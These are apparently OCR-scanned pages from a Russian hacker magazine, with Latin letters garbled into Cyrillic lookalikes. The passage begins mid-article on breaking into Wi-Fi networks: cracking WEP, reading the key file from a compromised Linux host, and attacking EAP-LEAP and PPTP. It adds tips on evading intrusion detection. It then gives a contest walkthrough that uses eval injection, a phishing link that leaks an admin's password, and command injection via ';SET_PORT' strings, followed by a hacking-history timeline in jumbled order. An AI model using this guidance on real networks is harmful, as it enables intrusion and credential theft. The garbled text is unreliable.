нуться. В документации к Аігсгаск'у подробно описан способ решения 
этой проблемы с помощью дополнительной карты, посылающей уже пе- 
рехваченные фреймы снова «в эфир», предварительно вставляя в них 
АВР-запросы (хитро задумано, не правда ли?), что позволит получить 
дополнительный трафик в виде ответов на них. На мой взгляд, это не 
совсем удобный вариант из-за того, что не у всех есть две карточки ѴѴі- 
Рі. Альтернативой может послужить использование проги РіІе2Аіг, умею- 
щей посылать данные в режиме мониторинга. 

В принципе, есть еще один способ узнать ѴѴЕР: если сеть подключена к 
интернету, то, проникнув через него на одну из машин, можно попытать- 
ся определить ѴѴЕР-ключ сетевого интерфейса ѴѴі-Рі. К примеру, в 
І_іпих-системе он хранится в файле /еіс/рстсіа/ѵѵігеіезз . оріз . 

[что дальше?] Защитный потенциал большинства беспроводных се- 
тей на этом и заканчивается. Но бывает, что нет. Сеть может функцио- 
нировать на базе стандарта 802. 1 х, может быть развернута виртуальная 
частная сеть (ѴРЫ). Здесь успех проникновения будет зависеть от мно- 
жества различных факторов. Универсального алгоритма дальнейших 
действий попросту нет. 

В системе аутентификации протокола 802. 1х могут использоваться раз- 
личные реализации протокола ЕАР: ЕАР-ТІ_3, ЕАР-ТТІ_3, ЕАР-РЕАР, ЕАР- 
І_ЕАР, ЕАР-ІѴГО5. На счет двух последних могу сказать, что они обладают 
уязвимостями. Существуют софтины Іеарсгаск, Азіеар-ітр для атаки про- 
тив ЕАР-І_ЕАР. ЕАР-ІѴЮ5 уязвим к атаке Мап-іп-іІіе-МісІсІІе. Атакующий мо- 
жет внедрить фальшивую точку доступа между хостом и ВАОІІІЗ-серве- 
ром, перехватив весь передаваемый трафик, в том числе имя и пароль. 
Техника проникновения в ѴРІ\І, развернутая на базе беспроводной сети, 
аналогична той, что может применяться в проводных сетях. Большинство 
ѴРЫ туннелируют трафик с помощью протоколов РРТР (РоіпНо-РоіпІ 
Типпеііпд Ргоіосоі) или ІРЗес. Для РРТР существует сплоит бесеіі.с от АІерП 
Опе. Протестировать на безопасность ІРЗес поможет тулза Іке-зсап. 

[системы Ю§] На всем протяжении взлома ты должен не забывать о 
возможном наличии системы обнаружения вторжений, следящей за 
функционированием сети и выявляющей различные аномалии в ней, то 
есть тебя. Чтобы проникнуть в сеть незаметно, тебе пригодятся некото- 
рые знания о принципах функционирования этих систем. ЮЗ может 
быть сигнатурной, на основе базы знаний и смешанного типа. Сигнатур- 
ные ЮЗ включают в себя базу данных о различных событиях, характер- 
ных для определенных атак. Системы на основе базы знаний ведут ста- 
тистику работы сети при нормальных условиях ее функционирования и 
сигнализируют о различных отклонениях. Какие же действия взломщи- 
ка могут вызвать тревогу ЮЗ? 

Во-первых, это активное сканирование. Поэтому используй только 
пассивное сканирование. Во-вторых, посылка фреймов с подозри- 
тельным ЕЗЗЮ. К числу подозрительных обычно причисляются: пус- 
тые, широковещательные ЕЗЗЮ, внесенные в блэк-лист и т.д. (кста- 
ти, в этом листе обычно содержатся ЕЗЗЮ, применяемые различны- 
ми хакерскими прогами, поэтому перед их применением иногда нуж- 
но слегка подправить исходники). В-третьих, неправильно подделан- 
ный МАС-адрес (дело в том, что МАС-адрес зависит от производите- 
ля и от конкретной модели беспроводного оборудования, а ЮЗ очень 
не нравится, когда попадается оборудование «неизвестного» произ- 
водителя). Посмотреть диапазоны адресов различного беспроводно- 
го оборудования можно в файлах сопІ/ар_тапиІ и сопі/сІіепі_тапиі в 
каталоге, содержащем Кізтеі. 



[)(] 

И напоследок. Перед тем, как два часа ломать сетку, опытный 
взломщик всегда осматривает близлежащую местность на предмет нали- 
чия значков, нарисованных мелом — некоторые добрые хакеры-варчокеры 
пишут в них все необходимые для входа в сеть данные © 




кізтеі в действии 











Отгремело хмельным весельем солнечное лето, за- 
горелый и веселый, ты вернулся с отдыха, и мы спе- 
шим занять твои мозги продуктивным мышлением. 
В этом месяце тебе придется как следует подумать, 
чтобы получить приз от редакции. Мы решили, что 
после нескольких статей о взломе программ тебе 
пора попробовать свои силы на этом фронте. Так 
что отправляйся на ѵѵѵѵѵѵ.радопак.ги за подробнос- 
тями, а пока я расскажу тебе, как надо было в ав- 
густовском конкурсе поступать в институт. 
Несложно заметить в самом начале, что все глобаль- 
ные переменные сохраняются на сервере по-ублюдс- 
ки: в виде текстовых строк рНр-кода $ѵаг1 = “ѵагГ; 
$ѵаг2 = “ѵаг2”; $ѵагЗ = “ѵагЗ”, которые затем выполня- 
ются при помощи функции еѵаІ(). Таким образом полу- 
чается, что если мы зададим глобальную переменную 
ѵагі равной строке «$ѵаг2», то в ѵагі окажется значе- 
ние ѵаг2. Далее, тебе нужно было наглым образом оду- 
рачить админа. Совершенно понятно, что если адми- 
нистратор перейдет по ссылке шт.рабопак.ги/?деі- 
рагат&раде=диезіЬоок&тзд=Іодіп:%20$Іодіп;разз:%2 
0$разз, то он запостит на гостевой книге сообщение с 
собственным логином и паролем. Каким же образом 
можно подкинуть эту ссылку админу? Да очень прос- 
то, для этого достаточно зарегистрировать пользова- 
теля с необычным ником ѵѵѵѵѵѵ.расіопак.ги/?деі- 
рагат&раде=диезіЬоок&тзд=Іодіп:%20$Іодіп;разз:%2 
0$разз и написать в книгу жалоб “$Іодіп”. В этом слу- 
чае до админа уже дойдет требуемая ссылка, и пос- 
кольку он очень доверчивый человек, то мигом пе- 
рейдет по ней и выдаст с потрохами свой пароль. Пос- 
ле того, как ты стал админом и получил права для ска- 
чивания исходников сайта, несложно заметить, что 
фото- и видео-камеры получают файлы от каких-то 
серверов, через машину-посредника. Промежуточно- 
му компьютеру передаются параметры подключения, 
адрес и номер камеры, в то время как порт он зна- 
ет сам. Между командами используется сепаратор 
«;», поэтому если обратиться по адресу ѵѵѵѵѵѵ.расіоп- 
ак.ги/?деірагат&раде=Шосатега& сатега=0] , на эк- 
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ране появится кусок справки, говорящий о том, что 
команда ЗЕТ_РОВТ устанавливает порт для подк- 
лючения. Теперь ты должен поэкспериментировать 
и попробовать натравить посредника для фотока- 
меры на видеокамеру. Для этого тебе нужно было 
написать простенькую программку, которая переб- 
рала бы все варианты портов по шаблону 
ЫІр://ѵѵ\л/\л/.расІопак.ги/?деІрагат&раде=іоІосат- 
ега& сатега=0;ЗЕТ_РОП Т%20234 .234 .234 ,234;8ЕТ_ 
РОРТ%20[искомый_порт ]. Когда твой скрипт найдет 
подходящий порт (9879), из-за разного количества 
получаемых параметров произойдет сдвиг во внут- 
ренних переменных скрипта, и, если длительность ви- 
део будет равной 5, то в графе оценки появится па- 
роль суперадмина. Длительность равна 5, если съем- 
ка идет со второй камеры, для этого надо шагнуть на 
\л/\л/ѵѵ.расІогіак.ги/?деІрагат&раде=ІоІосатега&сат- 
ега=2;8ЕТ_РОР Т%20234 .234 .234 .234;8ЕТ_РОР Т%20 
9879. Имея права суперадмина, ты сможешь добавить 
себя в базу данных и стать студентом. Первым эту 
наркоманскую цепочку рассуждений прошел хитроум- 
ный абитуриент ВОВМАІ\І_ВѴѴ (Ьогтап_Ьѵѵ@Ьк.ги) © 
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Большой хакер- 
ский таймлайн 

ВСЯ НАША ЖИЗНЬ — ЭТО ДАТЫ. ДЕНЬ РОЖ- 
ДЕНИЯ, ДЕНЬ ГОСУДАРСТВЕННОГО ФЛАГА, 
ДЕНЬ ОСВОБОЖДЕНИЯ НАМИБИИ, НОВЫЙ 
ГОД И ВОСЬМОЕ МАРТА. ЗНАМЕНАТЕЛЬНЫЕ 
ДАТЫ — НЕ ТОЛЬКО ПОВОД ДЛЯ ХОРОШЕЙ 
ВЫПИВКИ. НЕКОТОРЫЕ ИЗ НИХ НАДО ЗНАТЬ 

И ЧТИТЬ ВЕЧНО :) I тіпсІѵѵОгк (тіпсІѵѵОгк@датеІапсІ.ги) 

Вся история хакерства 



в датах 



[9 сентября 1945] В Гарвардском универси- 
тете зафиксирован первый в истории компью- 
терный баг. Моль, попавшая в систему пере- 
ключателей Магк II Аікеп Саісиіаіог, замкнула 
передачу данных, тем самым, вызвав ошибку. 
Баг удалось устранить, а несчастное насеко- 
мое сохранили в качестве музейного экспоната 
(а дяденька Билл Гейтс в своей книге потом на- 
писал нечто вроде «называть моль жучком 
(Ьид) не совсем, конечно, правильно, но так уж 
пошло» :) — прим. Лозовского). 

[1952] Грейс Мюррей Хоппер пишет первый 
компилятор, переводящий инструкции компью- 
теру с английского языка на машинный. Так же 
эта женщина, получившая известность своими 
работами в области математики и автоматиче- 
ской обработки данных, разработала первый 
язык программирования СОВОІ_ (Сотгтюп Визі- 
пезз-ОгіепіесІ І_апдиаде) для машин ІІІМІѴАС 1. 
[1954] Появился на свет первый язык высокого 
уровня Рогігап. Его автором стал Джон Бакус. 



[1958] Второй язык программирования высокого уровня получил назва- 
ние І_ізр и был разработан профессором из МТИ Джоном Маккарти. 
[1959] Рождение хакерского движения в Массачусетском Технологиче- 
ском Университете. Работая сначала на громоздких мейнфреймах ІВМ, 
а затем на более совершенных ТХ-0 и РБР, некоторые студенты инсти- 
тута постигали программирование и соревновались друг с другом в ис- 
кусстве оптимизации кода. Первыми хакерскими звездами МТИ стали: 
Питер Самсон, Алан Котак, Боб Сандерс, Билл Госпер, Джерри Сюзман, 
Питер Дач, Боб Вагнер, Том Кнайт и другие. Конец 50-х — начало 60-х 
вошли в историю как «Золотые годы хакерства». 

[1961] Произошел запуск первой системы распределенного времени 
СТЗЗ на компьютере ІВМ 7094, соединяющей 30 терминалов. 

[1963] Джек Дэннис вместе с другими студентами МТИ приступил к рабо- 
те на МІЛТІСЗ (МиШрІехеб ІпЬгтайоп апб Сотрийпд Зегѵісе) — операцион- 
ной системой, обладающей невиданными ранее возможностями. Проект 
оказался слишком амбициозным, и поскольку разработчики хотели соз- 
дать идеальную систему, работа над 
ОС продолжалась долгие годы. В 
итоге большинство участников ра- 
зочаровалось когда-либо закончить 
проект и к концу 60-х оставили его, 
чтобы заняться другими вещами. 

[1964] Студент МТИ Стюард Нель- 
сон написал на компьютере ТХ 
программу, генерирующую сигна- 
лы разных частот. Подключив 
машину к телефонной линии, он 
мог манипулировать телефонной 
сетью, прерывая сигнал «занято» 
или совершая бесплатные звонки. 









[7 апреля 1969] Выходит первый ВЕС (Вециезі Іог Соттепіз) — доку- 
мент, описывающий спецификации компьютерной сети. Опубликовал 
его Стив Крокер из Калифорнийского Университета. 

[1969] Слепой студент из Флориды Джо Энгрессиа, известный как ТНе 
ѴѴНізІІег, обнаружил, что с помощью насвистывания в телефонную трубку 
в определенном диапазоне частот (2600 герц), можно переключить теле- 
фонный сигнал таким образом, что междугородние звонки становятся бес- 
платными. Это открытие стало начальной точкой в развитии фрикинга. 
[29 октября 1969] Происходит экспериментальный запуск проекта 
АВРАпеІ — первой в истории компьютерной сети, создававшейся более 
7 лет. Первыми узлами стали Калифорнийский университет ІІСІ_А и 
Стэнфордский Исследовательский институт. К декабрю 1971 г. АВРАп- 
еі соединяла уже 23 компьютера. 

[1969] Кен Томпсон и Деннис Ричи, работники телефонной компании 
ВеІІ, пишут операционную систему ІІМХ. Создаваемая как файловая си- 
стема для запуска игры 8расе ТгаѵеІ на компьютере РЭР, ІІІМІХ стала са- 
мой гибкой и удобной ОС своего времени. 

[1970] Компания Оідііаі Ециіртепі Согрогайоп объявляет о производ- 
стве РЭР-1 1 — революционного компьютера, ставшего по-настоящему 
хакерской машиной в МТИ и других американских университетах. 
[1971] Джон Дрейпер, позже ставший известный под ником Сар'п 
СшпсИ, обнаружил, что подарочная свистулька в коробке с хлебными 
сладостями Сар'п СшпсИ, точно имитирует сигнал в диапазоне 2600 Гц. 
Из своей находки Дрейпер соорудил устройство под названием ВІие 
Вох, которое фрикеры на протяжении многих лет будут использовать 
для осуществления бесплатных звонков и взлома телефонных сетей, 
[октябрь 1971] В журнале Езциіге была опубликована статья Рона 
Розенбаума «Секреты маленькой синей коробочки», из которой ты- 
сячи людей узнали о блу боксах и фрикерах. Она же способствова- 
ла развитию фрикинга. 

[1972] 36-летний антивоенный активист Эбби Хоффман начинает вы- 
пуск информационной бюллетени ТНе ѴоіЛН Іпіегпаііопаі Рагіу І_іпе. Вско- 
ре по инициативе партнера Эбби, фрикера АІ ВеІІ, название меняется на 
ТАР (ТесИпісаІ Аззізіапсе Ргодгат), а основной направленностью изда- 
ния становится публикация разных трюков для борьбы с «бюрократиче- 
ской машиной». Например, способы звонить бесплатно с таксофона. 
[1973] В сети АВРАпеІ появляется самый первый вариант Словаря 
Хакерского Жаргона, отображающего мировоззрение, этику и осо- 
бенности хакерской культуры. 

[7 февраля 1973] Впервые представлен протокол РТР (Рііе Тгапзіег 
Ргоіосоі). 

[март 1973] Первые пробы международной связи по АВРАІМЕТ между 
английским университетом ІІСІ_ и норвежским ІМОВЗАВ. Количество 
компьютеров в Сети достигло 2000. 

[1973] Операционная система ІІІМІХ полностью переписана на языке С 
и стала стандартом де-факто для установки на компьютеры американ- 
ских исследовательских институтов. 

[1973] Студенты колледжа Стив Джобс и Стив Возняк, будущие осно- 
ватели Арріе СотріДег, начинают создавать и распространять блу бок- 
сы в ВУЗах родного города. 

[1974] Болт, Беранек и Ньюман представляют Теіпеі — первую коммер- 
ческую версию АВРАІМЕТ. 

[5 марта 1975] Проходит первая встреча участников клуба компьютер- 
ных энтузиастов НотеЬгеѵѵ. Его мемберы были пионерами персональ- 
ных компьютеров и в дальнейшем сильно повлияли на всю компьютер- 
ную историю. 

[1977] Билл Джой выпускает первую версию операционной системы 
ВЗЭ (Вегкеіеу ЗоКѵѵаге ОізІгіЬиІіоп). 

[1979] Появляются хакерские и фрикерские ВВЗ. Одними из первых 





Джон Дрейпер ака Сар'п СшпсИ 



стали легендарные ЗИегѵѵоосІ Ро- 
гезі и СаІсП-22, на которых публи- 
ковались секретные телефонные 
коды, пароли к компьютерным си- 
стемам, номера кредитных карт и 
трюки по обходу защит. 

[1979] Инженеры из исследова- 
тельского центра Хегох в Поло 
Альто создают первого компьютерного червя — маленькую программку, 
которая сканирует сеть в поисках простаивающих компьютеров. Руко- 
водствуясь благой целью увеличить эффективность работы машин, ав- 
торы положили начало эре компьютерных вирусов и червей, которые 
причинили вред на миллиарды долларов. 

[1979] Появляется система обмена сообщениями ІІЗЕЫЕТ, которая 
сразу же становится популярнейшим средством общения. 

[1979] Брайан Керниган и Денис Ричи представляют миру язык про- 
граммирования С. 

[1981] Иан Мерфи ака Саріаіп 2ар проникает на компьютеры крупней- 
шей телефонной компании АТ&Т и изменяет систему тарификации 
звонков таким образом, что все жители города звонили днем по цене 
ночных тарифов и наоборот. Сотрудникам компании удалось обнару- 
жить и исправить ошибку только через 2 дня. 

[12 сентября 1981] Рождения германского клуба «Хаос». С его помо- 
щью основатели Ву Холланд и Стефен Вернери собирались бороться с 
посягательством правительства на частную жизнь. За короткое время 
«Хаос» становится самым известным хак-клубом Европы. 

[1981] Обнаружен первый компьютерный вирус ЕІк СІопе, распростра- 
няющийся в Сети. Его отправной точкой стал Техасский А&М Универси- 
тет, а автор остался неизвестен. 

[1981] Полиция арестовывает банду Роско, в которую входили Кевин 
Митник, Роско Дюпейн, Сюзан Сандер и Стив Роудс. Несколько лет она 
терроризировала телефонные и компьютерные сети, но задержать ха- 
керов не удавалось. Заложила своих приятелей Сюзан, будучи любов- 
ницей Роско, не простившая ему измены. 

[1982] Группа из шести молодых хакеров, называющих себя 414 (в 
честь индекса района), производит взлом 60-ти компьютерных систем. 
В основном пострадали исследовательские университеты и научные ор- 
ганизации, такие как Лаборатория Лос Аламос и Центр изучения рако- 
вых болезней Манхэттена. 

[1982] Ричард Столман приступает к производству ОШ — свободного 
распространяемого клона ІІІМІХ, написанного на языке С. 

[1983] На экранах американских кинотеатров впервые выходит фильм 
«Военные игры» с Мэтью Бродериком в главной роли. Картина расска- 
зывает о хакере-подростке, взломавшем военную компьютерную систе- 
му, результатом чего могла стать Третья мировая война. Фильм стал от- 
кровением для многих молодых компьютерщиков того времени, вдохно- 
вив их изучать компьютерные системы. 

[1983] Состоялся релиз первого шелла Кот зГіеІІ (кзП). Автором его 
стал работник телефонной компании АТ&Т Дэвид Корн. 

[1984] Выходит специальный акт, дающий Секретной Службе США 
полномочия по расследованию компьютерных преступлений. 

[1984] Хакер с ником І_ех І_иФог основывает группу І_едіоп оі Эоот, 
ставшую вскоре самой многочисленной, квалифицированной и влия- 
тельной хакерской командой в мире. 

[1984] Выходит первый номер печатного хакерского журнала 2600: 
ТПе Наскег ОиаИегІу, главным редактором которого стал Эрик Корлей 
ака ЕттапиеІ (Зоісізіеіп. 

[1984] В г. Лоббок (Техас) получает рождение новая хакерская группа 
СиК оі ЭеасІ Соѵѵ. Основателями являлись Зѵѵатр Вайе, Ргапкеп ѲіЬе и ЗісІ 
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схема АВРАЫЕТ 1977 г. 



журнал 2600 



Ѵісіоиз, сисопы одноименной ВВ5. Изначально 
известная благодаря своему андеграундовому 
журналу, настоящую славу СоЭС получила по- 
сле релиза программы Васк Огііісе в 1998 г. 

[1984] Эндрю Тэненбаум пишет первую версию Міпіх — фриварного клона 
ІІІМІХ, который впоследствии вдохновит Линуса Торвальдса написать І_іпих. 
[15 марта 1985] Зарегистрирован первый домен ЗутЬоІісз.сот 
[ноябрь 1985] Рэнди Тишлер ака Тагап Кіпд и Крэг Неидорф ака КпідИІ 
Ыдіііпіпд выпускают первый номер журнала РПгаск. Создаваемый при 
участии многих представителей андеграунда, электронный и бесплат- 
ный, журнал быстро стал самым популярным хакерским изданием. 
[1985] Релиз МісгозоК ѴѴіпсІоѵѵз 1.0, которая продавалась по цене 100$. 
[2 октября 1986] Выходит Сотриіег Ргаиб апб АЬизе Асі, разработан- 
ный властями США, официально объявивший компьютерный взлом вне 
закона и определивший наказание за такого рода преступления. 

[1986] Один из первых компьютерных вирусов ТИе Вгаіп атакует систе- 
мы, работающие под МЗ-ЭОЗ. 

[1987] В Италии выходит первый номер кракерского журнала Оесобег. 
[1 987] С целью изучения и решения проблем компьютерной безопасности, 
основана зесигііу-организация СЕВТ (СотріЛег Етегдепсу Ріезропзе Теат). 
[1 987] Редакторы журнала РНгаск организуют закрытое андеграундовое па- 
ти ЗиттегСоп, которое посетили 20 известнейших американских хакеров. 
[1988] Первый случай использования Сотриіег Ргаиб апб АЬизе Асі в су- 
де. Герберту Зину ака ЗЬабоѵѵНаѵѵк вынесли обвинение во взломе ком- 
пьютеров АТ&Т и Министерства Обороны США и приговорили к штрафу 
в 10 тысяч долларов и тюремному заключению сроком 9 месяцев, 
[ноябрь 1988] Эпидемия компьютерного червя поражает АРРАЫЕТ, 
парализовав работу 6 тысяч компьютеров. Стартовав из Массачусет- 
ской Лаборатории ИИ, за одну 
ночь он заразил все ключевые уз- 
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лы сети. Чтобы нейтрализовать за- 
разу, в институте Беркли прошло 
срочное собрание крупнейших 
компьютерных специалистов стра- 
ны, которые дизассемблировали 
код. Автором червя оказался Роберт Моррис — 24-летний студент Кор- 
нельского университета, который допустил ошибку в коде программы, в 
результате чего, червь распространился с молниеносной быстротой. 
[1988] В результате компьютерного взлома, Первый Национальный 
банк Чикаго теряет 70 миллионов долларов. 

[1 989] Джуд Милтон ака 31. бибе и РШ. Зігіиз выпускают первый номер жур- 
нала Мопбо 2000 — одного из самых популярных технических изданий 90-х. 
[1989] РЬіЬег Оріік основывает группу Мазіегз оі Эесерііоп, целью ко- 
торой было стать лучшей хак-группой в мире. Следующие пару лет 
Мазіегз оі Эесерііоп активно борется с І_едіоп оі Эоот за этот титул — 
обе команды совершают ряд дерзких взломов, пытаясь переплюнуть 
друг друга. В 1992 г. «большая хакерская война» заканчивается аре- 
стом большинства мемберов МоЭ. 

[1989] Зафиксировано появление первых стелс-вирусов. 

[1989] После своего ареста ТЬе Мепіог пишет «Манифест Хакера», 
который был опубликован в журнале РЬгаск и получил огромную по- 
пулярность в андеграунде. 

[январь 1990] Состоялся суд над немецкими хакерами, обвиняемы- 
ми в шпионаже в пользу КГБ. Карл Кох, Питер Карл, Маркус Хесс и 
Доб на протяжении нескольких месяцев за деньги снабжали русскую 
разведку информацией, полученной в результате взлома правитель- 
ственных и коммерческих систем. Главным свидетелем на суде вы- 
ступил один из членов команды хакер Ганс Хьюбнер ака Репдо. За 
добровольное признание и дачу показаний против остальных его 
амнистировали. Остальные получили услов- 
ные сроки и штрафы. 

[1990] Женщина с псевдонимом Ыаіазііа Огі- 
догі запускает ВВЗ, ставшую центральным ме- 
стом общения софтварных пиратов. Позже она 
же станет основателем апіісЫІсІрогп.огд — 
группы хакеров, выслеживающих распростра- 
нителей детского порно и отсылающих сведе- 
ния о них правоохранительным структурам. 
[1990] Сформирована Еіесігопіс Ргопііег Роип- 
баііоп — организация по защите прав людей, 
арестованных по обвинению в компьютерных 
преступлениях. 

[1990] Состоялся суд над редактором журнала 
РНгаск Крэгом Неидорфом, опубликовавшим 
документ, в котором описывались специфика- 
ции телефонной службы 91 1 . Телефонная ком- 


























Роберт Моррис 



Цутому Шимомура 



Магк ТаЬаз 



РОР 



Кпідііі ЫдИІпіпд 



Эдди Хоффман 



[1993] Национальное Агентство Безопасности 
разработало ЗНА (Зесиге НазН АІдогШіт). 
[1993] Профессор Техасского университета А&М 
получает многочисленные смертельные угрозы, по- 
сле того как хакер, воспользовавшись его аккаун- 
том, разослал 20 тысяч расистских сообщений. 

[21 апреля 1993] Национальный центр разра- 
ботки приложений для суперкомпьютеров вы- 
пускает Мозаіс 1 .0 — первый в мире веб-брау- 
зер. Его разработчики вскоре станут основате- 
лями компании Ыеізсаре. 

[9 июля 1993] Джефф Мосс организует Ое- 
Ісоп — конференцию по компьютерной безо- 
пасности, проходящую в Лас-Вегасе. Мероприя- 
тие планировалось стать единовременным, но 
оказалось настолько популярным, что со- 
стоялось в следующем году и проводится ежегодно по сей день. 

[17 июля 1993] В свет выходит самый первый коммерческий ди- 
стрибутив Ыпих — ЗІаскѵѵаге. 

[Декабрь 1993] Релиз первой версии операционной системы РгееВЗО. 
[1994] Основана компания ВесІНаІ, которая выпускает один из самых 
популярных дистрибутивов Ыпих с одноименным названием. 

[12 января 1994] За многочисленные компьютерные преступления, 
Марка Абена ака РИіЬег Оріік, бывшего мембера І_едіоп оі Ооогп и ос- 
нователя Мазіегз оі Оесерііоп, приговаривают к году лишения свобо- 
ды. Вскоре после этого журнал Ыеѵѵ Ѵогк Мадагіпе включит хакера в 
список 100 умнейших людей города. 

[12 апреля 1994] В одной из новостных групп появляется рекламное 
сообщение двух адвокатов, рекламирующих свои услуги. Читатели, наз- 
вали это письмо зрат — с тех пор это словечко стало одним из самых 
распространенных компьютерных терминов. 

[1994] Хакеры осваивают интернет и переносят контент своих анде- 
граундовых ВВЗ на сайты. 

[1994] Русский хакер Владимир Левин взламывает компьютерную 
систему Ситибанка и переводит на свои счета в Финляндии и Изра- 
иле 10 миллионов долларов. Сотрудники банка быстро заморажи- 
вают эти счета, но сообщникам Левина удается обналичить 400 ты- 
сяч. Полиция Скотланд-Ярда арестовала хакера в Лондоне, куда 
тот приехал погостить. Приютив его на полтора года в английской 
тюрьме, власти потом доставили Владимира в Сан-Францико, где 
судили снова и приговорили к тюремному заключению теперь уже в 
американской тюрьме. 

[25 декабря 1994] Компьютерный эксперт Цутому Шимомура помога- 
ет полиции выследить Кевина Митника, который взломал его компьюте- 
ры и оставил издевательское сообщение. На суде против Митника вы- 
двигают обвинение во взломе многочисленных компьютерных систем, 
краже коммерческого ПО и 20 тысяч номеров кредитных карт. На этот 
раз хакер получает 5 лет тюрьмы. 

[1995] На экраны выходят фильмы: «Сеть» и «Хакеры». 

[1995] Министерство Обороны США заявляет о зафиксированных 250 
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пания оценила стоимость документа в 80 тысяч долларов, но на суде 
удалось доказать, что этот текстовый файл доступен в библиотеке шта- 
та всем желающим и его реальная цена не превышает 13$. Крэга опра- 
вдали. 

[май 1990] Проходит операция ЗипбеѵіІ — крупнейший в истории анти- 
хакерский рейд, охвативший 13 городов. В операции были задействова- 
ны 150 сотрудников спецслужб, которым удалось изъять 42 компьютера, 
23 тысячи флоппи-дисков, гору распечаток и других хакерских инстру- 
ментов. Задержанные хакеры давали показания друг против друга в об- 
мен на амнистию, что не лучшим образом повлияло на некогда дружный 
андеграунд. Результатом рейда стало также закрытие многих крупных 
хакерских ВВЗ и привело к уходу со сцены известных хакеров. 

[1990] Кевин Поулсен совместно с Роном Остином совершают свою из- 
вестную радио-аферу. Когда Лос-Анджелесская радиостанция объявила 
о конкурсе, в котором 102-му по счету дозвонившемуся пообещали пре- 
зентовать Порше стоимостью 50 тысяч долларов, хакеры взломали те- 
лефонную сеть станции и захватили управление над 25 телефонными 
линиями. Естественно, 102-м номером оказался Кевин, который позже 
забрал свой приз, а еще позже был арестован. 

[1991] Состоялся релиз РОР (РгеИу ОоосІ Ргіѵасу) — шифровальной 
программы, разработанной Филиппом Зиммерманом. Правительство 
США выдвинуло против автора обвинение в нарушении экспортных 
ограничений шифровального ПО, но это не помешало РОР стать все- 
мирно популярным инструментом для защиты данных. 

[1991] Выходит первый текстовый браузер І_упх под ІІМХ. 

[6 августа 1991] Тим Бернерс-Ли объявил о начале работы над ѴѴѴѴѴѴ. 
[17 сентября 1991] Линус Торвальдс представляет первую версию 
своей операционной системы Ыпих. 

[1992] Компьютерное сообщество взбудоражено угрозой запуска ви- 
руса «Микеланджело», который 6 марта 1992 г. должен был обрушить 
тысячи компьютеров во всем мире. Но когда настала роковая дата, 
инцидента не произошло. 

[1992] На экраны выходит фильм Зпеакегз, рассказывающий о группе 
профессиональных хакеров. 
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тысячах хакерских атаках на их компьютеры только в текущем году. 
65% атак этих были успешными. 

[1995] Группа РНопетазІегз под предводительством бывшего 
мембера І_оО хакера Магк ТаЬаз наводит хаос в телефонных се- 
тях АТ&Т, ВгШзН Теіесот, ОТЕ, МСІ ѴѴогІсЮот, ЗргіпЦ ЗоиШѵѵез- 
Іегп ВеІІ и правительственных компьютерных системах. На нес- 
колько месяцев хакерская банда становится настоящей чумой 
для телефонных компаний. В конце года ФБР устанавливает 
прослушивание за членами группы и арестовывает лидера. Магк 
ТаЬаз получает 5 лет тюрьмы. 

[18 марта 1995] В Сети появляется программа ЗАТАЫ (Зесигііу Абті- 
пізігаіог ТооІ Іог Апаіугіпд Ыеіѵѵогкз), написанная известными зесигііу- 
экспертами Дэном Фармером и Вицем Венемой. Утилита позициониру- 
ется как инструмент для админов по выявлению уязвимостей в своей се- 
ти, но сразу же поступает на вооружение хакеров. Споры по поводу ле- 
гальности такого рода программ не утихают до сих пор. 

[5 мая 1995] Крис Лампрехт ака Міпог ТЬгеаІ становится первым чело- 
веком, которому официально запретили пользоваться интернетом. Ха- 
кера судили за ряд компьютерных преступлений, включая воровство и 
продажу данных из внутренней сети компании ВеІІ. Міпог ТЬгеаІ также 
известен как автор ТопеІ_ос — программы, сканирующей телефонные 
сети в поисках модемных сигналов. 

[1 2 июля 1995] Тату Юлонен представляет зесигііу-сообществу прото- 
кол ЗЗН (Зесиге ЗЬеІІ). 

[август 1995] МісгозоК выпускает ѴѴіпсІоѵѵз 95, которая расходится 1 
миллионом копий в течение первых 4 дней. 

[1996] Хакерская группа ВгоІЬегЬоосІ взламывает Канадскую радиове- 
щательную компанию. 

[1997] Выходит программа АОНеІІ, которая позволяет любым, даже да- 
леким от хакерства людям, нести хаос в сетях крупнейшего американ- 
ского провайдера Атегіса Опііпе. В течение нескольких дней электрон- 
ные ящики тысяч АОІ_-юзеров подвержены атакам многомегабайтных 
мейл-бомб, а внутренние чат-серверы — флуду. 

[1997] 15-летний хакер Сгоаііап взламывает компьютеры Военно-воз- 
душной базы США в Гуаме. 

[1997] Хакерам удается пробить защиту ѴѴіпсІоѵѵз ЫТ. 

[28 январь 1997] Компания ВЗА Оаіа Зесигііу предлагает зесигііу-со- 
обществу взломать свой новый 40-битный код. Иан Голдберг, выпускник 
Калифорнийского университета Беркли, использует для этого кластер 
из 250 рабочих станций, перебирающих более 100 миллиардов комби- 
наций в час. Ему понадобилось 3.5 часа, чтобы расшифровать сообще- 
ние: «Именно поэтому нужно использовать более длинный ключ». 
[1997] Новая хакпати ОгеатЬаск проводится в Швеции и сразу завое- 
вывает огромную популярность. 

[сентябрь 1997] Рождение ЗІазЬсІоІ — центрального ресурса для всех, 
кто интересуется новыми технологиями. 

[1998] На сайте УаЬоо.сот появляется сообщение о возможном полу- 
чении логической бомбы после захода на поисковик. Бомба грозила 
взорваться, если власти не выпустят Кевина Митника к указанному сро- 
ку на свободу, но угрозы оказались блефом. 

[февраль 1998] Сетевой Софтварный Консорциум (ІЗС) предлагает 
для повышения безопасности ОІМЗ-серверов использовать ОЫЗЗЕС. 
[1998] В качестве протеста по поводу заключения Митника, взломан 
официальный сайт газеты ТНе І\Іеѵѵ Ѵогк Тітез. Хакеры, называющие се- 
бя НРС (Наскіпд Іог дігіз), обещают не останавливаться на этом. 

[1998] Двое китайских хакеров приговорены к расстрелу за взлом бан- 
ковских компьютеров и кражу 31 тысячи долларов. 

[1998] Израильский тинейджер известный под псевдонимом ТНе Апа- 
Іугег проникает во внутреннюю сеть Пентагона. Полиции удалось бы- 
стро найти его и арестовать. 

[1998] Хакерская группа І_0рІіІ приглашена в Сенат для консультаций 
по вопросам компьютерной безопасности. Хакеры убедили правитель- 
ство, что им достаточно 30 минут, 
чтобы прервать доступ пользова- 
телей к сети по всей Америке. 

[ноябрь 1999] 15-летний норвеж- 
ский хакер Йон Йохансен ака 0\Ю 
Зоп вместе с двумя приятелями из 
группы МоВЕ (Мазіегз оі Веѵегзе 
Епдіпеегіпд) выпускают программу 
БеСЗЗ, снимающую защиту СЗЗ 
(Сопіепі ЗсгатЫіпд Зузіет), кото- 
рая является стандартом для ли- 
цензионных ОѴО. 

[1999] Президент США Билл 
Клинтон выступает с заявлением о 
своем намерении выделить на по- 



